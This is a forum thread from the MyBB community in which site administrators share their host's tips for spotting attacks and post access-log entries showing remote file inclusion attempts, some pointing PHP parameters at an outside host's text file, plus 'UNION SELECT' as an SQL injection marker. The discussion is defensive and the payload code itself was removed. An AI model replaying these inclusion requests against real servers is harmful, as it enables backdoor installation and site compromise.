MyBB Community Forums

Advise from my host about what to look for to detect hacking or other suspicious activity:

Generally, you need to look for requests, which target a PHP file on your website and end with:

=http://externalURL

This is a common method for exploiting vulnerable scripts by including external malicious content.

Another log entries, which may indicate hacking attempts include:

"UNION SELECT"

which is used for SQL injections, targeting your database data (usually trying to find the password for the administrator user).

Well guess what I saw in visitor's log today:

86.122.170.50
//index.php?&news_act=read&news_id=http://www.kyokushin.hu/fx29id2.txt???
Http Code: 200 Date: May 04 14:07:07 Http Version: HTTP/1.1 Size in Bytes: 5889
Referer: -
Agent: Mozilla/5.0





/forum//index.php?&news_act=read&news_id=http://www.kyokushin.hu/fx29id2.txt???
Http Code: 200 Date: May 04 14:07:08 Http Version: HTTP/1.1 Size in Bytes: 68074
Referer: -
Agent: Mozilla/5.0





/forum/index.php//index.php?&news_act=read&news_id=http://www.kyokushin.hu/fx29id2.txt???
Http Code: 200 Date: May 04 14:07:08 Http Version: HTTP/1.1 Size in Bytes: 68074
Referer: -
Agent: Mozilla/5.0


Anybody else seen stuff like this or recognize it?

http://www.google.com/search?q=http%3A%2...=firefox-a


Is the visitor log in your acp at the host or at your acp on your board?

The actual php code for that text file is this, don't ask me what it is doing i have no clue with php.

PHP code removed >> Tomm M

Someone is testing your site/server security.

its a backdoor virus....

(2009-05-05, 12:38 AM)Pow-Mia Wrote: [ -> ]http://www.google.com/search?q=http%3A%2...=firefox-a


Is the visitor log in your acp at the host or at your acp on your board?

This is on cpanel at host site.

---

Hmm.........interesting. So far 14 attempts, and that's just going back to April 24. Some of them have "Walkers game ear" in the lines. ?

Here's an interesting one:

/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://garnet
Http Code: 404 Date: Apr 30 09:14:56 Http Version: HTTP/1.1 Size in Bytes: 2489
Referer: -
Agent: Mozilla/5.0





/forum/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://
Http Code: 404 Date: Apr 30 09:15:01 Http Version: HTTP/1.1 Size in Bytes: 2489
Referer: -
Agent: Mozilla/5.0

Try and block the I.P address that the people/person are from

It's a pretty standard remote file injection script - basically testing how good the security if your script/server/site is.

Best to contact your host with this, and provide as much detail as you can - they will be able to deal with the person responsible a lot more than your IP blocking capabilities...

Tomm, can you just block the I.P addresses from the people?

IP Blocking is usually a waste of time. Most legit attempts from hackers use proxies. IP banning is 95% ineffective.